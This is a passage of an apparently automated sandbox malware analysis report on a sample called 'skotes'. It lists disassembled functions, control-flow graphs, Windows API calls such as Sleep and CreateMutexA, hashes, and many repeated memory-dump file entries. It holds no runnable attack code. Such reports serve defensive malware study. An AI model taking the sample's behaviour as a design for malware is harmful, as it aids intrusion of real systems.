                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __dosmaperr$File$CreateType
                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                          • API String ID: 3443242726-2852464175
                                                                                                                                                                                                                                          • Opcode ID: ef9b1c0fb60b4906c1735fd06f5fca3a6dedf76a9669aa390992b4eb616d9c0c
                                                                                                                                                                                                                                          • Instruction ID: 08b327a59d4d73a7b139725971a6e47751f813552d0347311582286318325e07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef9b1c0fb60b4906c1735fd06f5fca3a6dedf76a9669aa390992b4eb616d9c0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8A10632E141486FCF199F68C951BAE3BA2DB0B320F24018EF851AF391DB759D12CB55
                                                                                                                                                                                                                                          Function 006D26F2 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2205 6d26f2-6d271a call 6d2133 call 6d2191 2210 6d2720-6d272c call 6d2139 2205->2210 2211 6d2842-6d289e call 6c6c87 call 6d62ee 2205->2211 2210->2211 2216 6d2732-6d273e call 6d2165 2210->2216 2223 6d28a8-6d28ab 2211->2223 2224 6d28a0-6d28a6 2211->2224 2216->2211 2222 6d2744-6d2765 call 6cadf5 GetTimeZoneInformation 2216->2222 2233 6d276b-6d278c 2222->2233 2234 6d2820-6d2841 call 6d212d call 6d2121 call 6d2127 2222->2234 2225 6d28ad-6d28bd call 6cb04b 2223->2225 2226 6d28ee-6d2900 2223->2226 2224->2226 2239 6d28bf 2225->2239 2240 6d28c7-6d28e0 call 6d62ee 2225->2240 2230 6d2910 2226->2230 2231 6d2902-6d2905 2226->2231 2235 6d2915-6d292a call 6cadf5 call 6acff1 2230->2235 2236 6d2910 call 6d26f2 2230->2236 2231->2230 2237 6d2907-6d290e call 6d2517 2231->2237 2241 6d278e-6d2793 2233->2241 2242 6d2796-6d279d 2233->2242 2236->2235 2237->2235 2246 6d28c0-6d28c5 call 6cadf5 2239->2246 2261 6d28e5-6d28eb call 6cadf5 2240->2261 2262 6d28e2-6d28e3 2240->2262 2241->2242 2247 6d27af-6d27b1 2242->2247 2248 6d279f-6d27a6 2242->2248 2267 6d28ed 2246->2267 2256 6d27b3-6d27dc call 6cef17 call 6ce926 2247->2256 2248->2247 2254 6d27a8-6d27ad 2248->2254 2254->2256 2272 6d27de-6d27e1 2256->2272 2273 6d27ea-6d27ec 2256->2273 2261->2267 2262->2246 2267->2226 2272->2273 2274 6d27e3-6d27e8 2272->2274 2275 6d27ee-6d280c call 6ce926 2273->2275 2274->2275 2278 6d280e-6d2811 2275->2278 2279 6d281b-6d281e 2275->2279 2278->2279 2280 6d2813-6d2819 2278->2280 2279->2234 2280->2234
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,006E6758), ref: 006D275C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InformationTimeZone
                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time$Xgn
                                                                                                                                                                                                                                          • API String ID: 565725191-2117068305
                                                                                                                                                                                                                                          • Opcode ID: 90fcd1c4f7a137f24241bbcdbd721bfb0bc106bed6a09718417cf062001a749a
                                                                                                                                                                                                                                          • Instruction ID: 4db4e0217f8d41ac968fcd2e4ad18eab9195c06af3ca9d7cd1fc1e19b13fe7c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90fcd1c4f7a137f24241bbcdbd721bfb0bc106bed6a09718417cf062001a749a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51E372D0021AABDB20AF69CC919BA77BBEF65320B10416FF520A3391E7309E45DB54
                                                                                                                                                                                                                                          Function 006C6FB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2281 6c6fb4-6c6fe9 GetFileType 2282 6c6fef-6c6ffa 2281->2282 2283 6c70a1-6c70a4 2281->2283 2284 6c701c-6c7038 call 6c40f0 GetFileInformationByHandle 2282->2284 2285 6c6ffc-6c700d call 6c732a 2282->2285 2286 6c70cd-6c70f5 2283->2286 2287 6c70a6-6c70a9 2283->2287 2296 6c70be-6c70cb call 6c75c0 2284->2296 2302 6c703e-6c7080 call 6c727c call 6c7124 * 3 2284->2302 2299 6c70ba-6c70bc 2285->2299 2300 6c7013-6c701a 2285->2300 2288 6c70f7-6c710a 2286->2288 2289 6c7112-6c7114 2286->2289 2287->2286 2292 6c70ab-6c70ad 2287->2292 2288->2289 2305 6c710c-6c710f 2288->2305 2294 6c7115-6c7123 call 6acff1 2289->2294 2292->2296 2297 6c70af-6c70b4 call 6c75f6 2292->2297 2296->2299 2297->2299 2299->2294 2300->2284 2317 6c7085-6c709d call 6c7249 2302->2317 2305->2289 2317->2289 2320 6c709f 2317->2320 2320->2299
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,006C6EE6), ref: 006C6FD6
                                                                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 006C7030
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 006C70C5
                                                                                                                                                                                                                                            • Part of subcall function 006C732A: __dosmaperr.LIBCMT ref: 006C735F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                                                                          • String ID: nl
                                                                                                                                                                                                                                          • API String ID: 2531987475-1531707334
                                                                                                                                                                                                                                          • Opcode ID: 86f9b8ffcf67caec2989078c2a847a15e451043f2ef0d08084acfec419729484
                                                                                                                                                                                                                                          • Instruction ID: 0c34bbb39e0f941d8b8f4afc16991d4035ec435c28ceb7ac8e04d63ea61cdfdd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86f9b8ffcf67caec2989078c2a847a15e451043f2ef0d08084acfec419729484
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16416EB5A04204ABDB24EF75DC45EBBB7FAEF89300B14442DF856D3611E630A900CF61
                                                                                                                                                                                                                                          Function 00699BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2321 699ba5-699bc5 GetFileAttributesA 2324 699bf3-699c0f 2321->2324 2325 699bc7-699bd3 2321->2325 2326 699c3d-699c5c 2324->2326 2327 699c11-699c1d 2324->2327 2328 699be9-699bf0 call 6ad663 2325->2328 2329 699bd5-699be3 2325->2329 2332 699c8a-69a916 call 6a80c0 2326->2332 2333 699c5e-699c6a 2326->2333 2330 699c1f-699c2d 2327->2330 2331 699c33-699c3a call 6ad663 2327->2331 2328->2324 2329->2328 2334 69a91c 2329->2334 2330->2331 2330->2334 2331->2326 2337 699c6c-699c7a 2333->2337 2338 699c80-699c87 call 6ad663 2333->2338 2340 69a953-69a987 Sleep CreateMutexA 2334->2340 2341 69a91c call 6c6c6a 2334->2341 2337->2334 2337->2338 2338->2332 2349 69a98e-69a994 2340->2349 2341->2340 2351 69a9a7-69a9a8 2349->2351 2352 69a996-69a998 2349->2352 2352->2351 2353 69a99a-69a9a5 2352->2353 2353->2351 2355 69a9a9-69a9b0 call 6c6629 2353->2355
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00699BA8
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
